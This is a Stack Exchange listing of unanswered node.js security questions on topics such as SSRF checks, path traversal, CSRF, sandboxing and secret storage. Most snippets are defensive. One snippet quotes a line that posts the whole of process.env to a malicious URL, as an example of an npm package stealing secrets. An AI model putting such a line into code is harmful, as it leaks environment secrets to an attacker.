All Questions

Tagged with
368 questions with no upvoted or accepted answers
Filter by
Sorted by
Tagged with
12votes
1answer
576views

Disable Networking in Electron

electron.js is a user interface toolkit that allows a web application to operate as an arbitrary GUI. However, there are some applications that should be considered sensitive - for instance, a GUI ...
user avatar
  • 3,735
6votes
0answers
3kviews

Node.js: How do I protect against malicious image file uploads? I.e., how do I implement an image sanitizer in Node?

I am creating a web app using hapi.js that allows users to upload images. I am validating the uploaded images in both the client and server to only allow .jpg/.jpeg, .png, and .gif files. However, I ...
user avatar
6votes
1answer
680views

Design for Mobile Authentication with NodeJS server

I recently struggled with the problem of security and user authentication for an iOS app I'm making, the main problem problem being how does one allow users to sign up with any 3rd party service (or a ...
user avatar
  • 6,560
5votes
2answers
743views

How to securely set database password in Strapi?

The Strapi framework (as far as I understand) requires the database password to be provided at launch. Usually, the password is specified in the database.js file, like this: module.exports = ({ env }) ...
user avatar
5votes
1answer
2kviews

Security Implications in Electron as a Web Browser

I asked this question a little over a week ago on the Atom forums (link below), and didn't receive a response, so I am reposting it here in the hopes that someone may be able to provide insight on my ...
user avatar
  • 51
5votes
0answers
785views

I want to store users' profile images in S3 and display them client side - what is the best practice for exposing S3 objects to mobile client?

So I have an Android chat application where users can create profile photos. These photos are sent to my Node JS backend where I upload them to my AWS S3 bucket. I store the key to their image in my ...
user avatar
5votes
1answer
1kviews

MSCHAPv2 with RADIUS - How exactly does the encrypting process go?

I'm building a RADIUS Server to work with MS-CHAPv2 in node.js. I have a RADIUS CLient, which is the VPN Server that sends me the following in an Access-Request: User-Name MS-CHAP-Challenge MS-...
user avatar
4votes
0answers
109views

Supplement for Vm2 js which can securely run untrusted code in languages other than Javascript

I am trying to implement a Node js web app, a simpler version of which is that users submit code files in multiple programming languages like C++, Python, Java, Js etc and the output produced,is shown ...
user avatar
4votes
0answers
410views

How to check if URL is public (anti-SSRF)?

I have a form on the site which allows the user to input URL - node.js app will then use request module to fetch that URL, analyze the response, and print some data back to the user. I want to make ...
user avatar
  • 26.1k
4votes
1answer
3kviews

node.js csurf invalid csrf token

I'm using nom's csurf module with express. Everything were working perfectly since last 3 days. Now every time I post form I get invalid csrf token error. I'm using latest versions of csurf and ...
user avatar
  • 55
4votes
0answers
911views

node.js runInNewContext with untrusted code

According to the node.js vm module docs: Note that running untrusted code is a tricky business requiring great care. To prevent accidental global variable leakage, vm.runInNewContext is quite ...
user avatar
3votes
0answers
37views

Can req.user of passport.js be manipulated?

in my api whenever I get a request I check out the req.user._id which is added to any request when you have nodejs using the passportJS authentication middleware. My question is this: can a hacker ...
user avatar
3votes
0answers
188views

How to get Node to trust root certs in my Windows OS certificate store?

My organization has pre-installed its own root certificates in our machines to enable it to inspect HTTPS traffic. The browsers don't complain since they trust the OS certificates by default. This ...
user avatar
  • 36.4k
3votes
1answer
389views

Restrict(sandbox) node.js file access

I am developing a web app, and for security reasons I want node to only be able to access a specific folder(and sub-folders). Is this possible?
user avatar
  • 105
3votes
0answers
1kviews

NodeJS and AngularJS - Secure REST API with Client Certificate Authentication

I am currently working on making my REST Api Server (NodeJS + Express + Mongoose) secure, so nobody, except my client application (AngularJS 1.6) and my admin application (based on AngularJS 1.6), can ...
user avatar
3votes
0answers
3kviews

Websocket handshake, JWT understanding security

Hi I'm trying to understand how this handshake works and JWT. So I have something as web page where the some user can go and login itself. Then I create an JWT, so when I do request to the server I ...
user avatar
  • 579
3votes
0answers
2kviews

Definitive regex to secure against path traversal, plus pseudo-code to handle related items

I am creating a webserver framework (in Node.JS), and I want to include path traversal as a built in feature so that the apps don't have to. Perhaps this can become the definitive guide to securing ...
user avatar
  • 80.6k
3votes
3answers
1kviews

Securing REST API calls with client-side token

I have a node.js REST API and I want to restrict POST/PUT/DELETE calls to a predefined list of "sources" (web applications which I do not own the code). The only way I see to achieve this is to put ...
user avatar
  • 1,515
3votes
1answer
5kviews

Helmet CSP not working correctly?

Using Vue SPA distributed by Express. this is my helmet code in express app.use(helmet.contentSecurityPolicy({ directives: { defaultSrc: ["'self'"], styleSrc: ["'self'","'unsafe-inline'" ,'...
user avatar
  • 27
2votes
0answers
1kviews

How to fix : Inefficient Regular Expression Complexity in chalk/ansi-regex

sudo npm audit gives me this error - npm audit report ansi-regex >2.1.1 <5.0.1 Severity: moderate Inefficient Regular Expression Complexity in chalk/ansi-regex - https://github.com/advisories/...
user avatar
  • 21
2votes
0answers
21views

How Firebase auth Really distinguish between real user or hacker?

Scenario Fire store model uid1 name :john uid2 name : alex Frontend (react-firebase) Login with credentials Requesting Db to give the name of the user with uid = uid1 and User getting uid from ...
user avatar
  • 119
2votes
0answers
16views

Is there any tools for software composition analysis with nested package.json files

As we discovered npm audit works only with top-level package.json in the project folder. I've already tested snyk and retire and it seems that they work a similar way. Perhaps some of you faced the ...
user avatar
2votes
0answers
78views

node.js / express app with cwe-352 vulnerability

I have a simple Node.js / Express app, which receives a cwe-352 vulnerability warning at the following line of code that creates the instance of Express: const app = express(); I have researched this ...
user avatar
  • 337
2votes
0answers
122views

How to check if any npm packages are stealing environment variables from my system?

Forgive me if this is senseless. But adding a line like this: // to convey the idea I'm using https://www.npmjs.com/package/got got.post(maliciousUrl, {json: process.env}) isn't enough to send the ...
user avatar
  • 1,524
2votes
0answers
21views

Give admins app to book a service for a user in another app using some api key

I have two apps setup in node. Both share same database. So, there is an app for users. Users can see their addresses, wallet, book services etc. There is another app for admins and ops team, where ...
user avatar
2votes
0answers
184views

Can anyone help diagnose what could be causing this (Error: error:0909006C:PEM routines:get_name:no start line) When I start my node app?

I am trying to deploy my site using nginx with a node/express App. I really can't figure out what this is coming from as the only other google hit is for an auth0 issue which I am not using here. For ...
user avatar
  • 33
2votes
0answers
102views

CSRF Protection when using the Spotify Authorization endpoint

I am trying to implement the ability for my users to link their Spotify account to their profiles in my app. In Spotify's official API docs, it says that the STATE field should be provided when ...
user avatar
2votes
0answers
80views

Trust in docker hub images where content-trust is not maintained

I've recently been examining the possibility of using containers for node applications. Ideally I would like to use --disable-content-trust=false when consuming images. This works when downloading ...
user avatar
  • 21
2votes
0answers
508views

Where to store access token(JWT) on SPA when server is on another domain

My frontend is on domain1 and backend is on domain2, meaning communication is cross site. On user authentication server responds with JWT token. Question is: Where do I safely store that token client-...
user avatar
2votes
0answers
139views

Environement variables size limit beanstalk node.js

I have an aws beanstalk instance with node.js where the limit for the size of the .env is 4096 bytes. I need more than that, there's no way i can fit all the secret keys in this space. Is there a way ...
user avatar
2votes
0answers
94views

Explicit npm package versions are more secure?

Installing explicit package versions with the flag --save-exact is considered to be more secure? I've found a post on a Medium https://medium.com/tkssharma/secure-node-js-apps-7613973b6971 (Go to Use ...
user avatar
2votes
0answers
81views

What is the proper way to synchronize/secure sensitive data in my application?

Background I've been out of the web app development realm for a few years and I've recently come back into it. There are a few questions I have about best security practices for performing the ...
user avatar
2votes
2answers
975views

Is there a way to store my MySQL passwords in Node.JS securely?

I am using Node.js for a web application. The app talks directly to MySQL and therefore, I need to specify the password to use for the connection however, this requires the password to be visible in ...
user avatar
  • 161
2votes
0answers
390views

Is it secure to pass a fixed API key in request body

I am currently building a bot using node.js I would like to secure one route only to be used for cronjob task I looked at all the solutions on the internet and I feel they are overkill for my ...
user avatar
  • 444
2votes
0answers
502views

Node.js / Websockets - Adding security to server - html client connection

I've created a websocket server using node.js and the ws module: var options = { port: 8080, key: fs.readFileSync('ssl/key.key'), cert: fs.readFileSync('ssl/cert.cert'), ca: fs....
user avatar
  • 69
2votes
0answers
885views

OAuth2 flow for multiple resource servers

As I'm trying to create a unified OAuth2 system for an internal custom userbase system a question/problem arouse for which i couldn't find a fitting documentation: In our microservice application/...
user avatar
  • 1,434
2votes
0answers
314views

What are the security considerations for the size of an array that can be passed over HTTP to a JavaScript server?

I'm dealing with the library qs in Node.js, which lets you stringify and parse query strings. For example, if I want to send a query with an array of items, I would do qs.stringify({ items: [1,2,3] })...
user avatar
  • 18.3k
2votes
1answer
70views

Authentication and Authorization in a product ecosystem

I have a product ecosystem consisting of multiple products i.e: An angular app, a website and a hybrid app all powered by node back end. So, now I want to add a single authentication and ...
user avatar
2votes
0answers
179views

collection level access control with mongoose

I am trying to implement collection level access control using mongoose in my web application. I have created users with different roles. User with superadmin role can do anything however user with ...
user avatar
2votes
0answers
272views

Sync'ing ACL permissions in a NodeJS application using MongoDB

Currently using the Node ACL module from: https://github.com/OptimalBits/node_acl This is working a treat but now the requirement is have to reflect any changes to our security config in our ACL ...
user avatar
2votes
0answers
623views

Correct way to protect URL with JSON web token

Say I have the following non-api route: app.get('/userprofile', isAuthenticated(), function(request, response) { response.render('pages/userprofile'); }); What is the correct way to protect that ...
user avatar
  • 1,997
2votes
0answers
230views

How to use Kerberos in a NodeJS server?

I need to migrate a .net kerberos application to a nodejs environment. The application currently takes an incoming request from a .net client and based on the domain and user within domain they are ...
user avatar
  • 3,223
2votes
1answer
1kviews

Nodejs, PM2, and nginx deploying security?

There are a few guides online that show how to get nodejs running on a server, but they tend to skip over a few details on security. This is a bit of a loaded question, and I'm not sure where to begin....
user avatar
  • 1,833
2votes
0answers
120views

REST API Security and CrossPlatform

I'm working on rest api with node.js. I create jwt-token in /signup endpoint. Then send this token every ios-app,windowsphone-app requests in Authoriziton header. So api try find user which contain ...
user avatar
  • 237
2votes
0answers
279views

Safe passwords locally with node-webkit

I have to save password locally in my application. Unfortunately I can't just hash them because I have to use it every time the application starts. Is there a possibility to save the password and keep ...
user avatar
2votes
1answer
3kviews

node.js - secure image file upload

We had to implement an image uploader for a node.js project. As framework we are using express.js We did it like described here: http://howtonode.org/really-simple-file-uploads But we are not sure ...
user avatar
  • 1,203
2votes
1answer
399views

How to securly store and use a customer's AWS Secret Key

Is it acceptable to store a customer's secret key & access key id on my server to allow me to access the AWS API on their behalf? For a password it is simply a matter of using a hash to store an ...
user avatar
  • 4,886
2votes
1answer
398views

Run npm script after a package is installed in the project

What I want is a way to run a script after I have installed a package into my project. The postinstall does not work for my case since it runs every time my project is installed somewhere else, which ...
user avatar
1vote
0answers
23views

How to make PostgreSQL queries secure on Heroku

I'm wondering if the following Postgres queries are secure. I seem to have some gaps in a user id table, but I'm not sure what the cause is, so I'd like to make sure these queries are safe from ...
user avatar
1vote
0answers
43views

While using a socket to send and receive passwords, does it encrypt the data?

I'm trying to make a login and sign-up system (I am hashing and salting the password). When I send the password to the server I'm using socket.emit() to send and receive data. Does socket ...
user avatar
  • 11

15 30 50 per page
1
2 3 4 5
8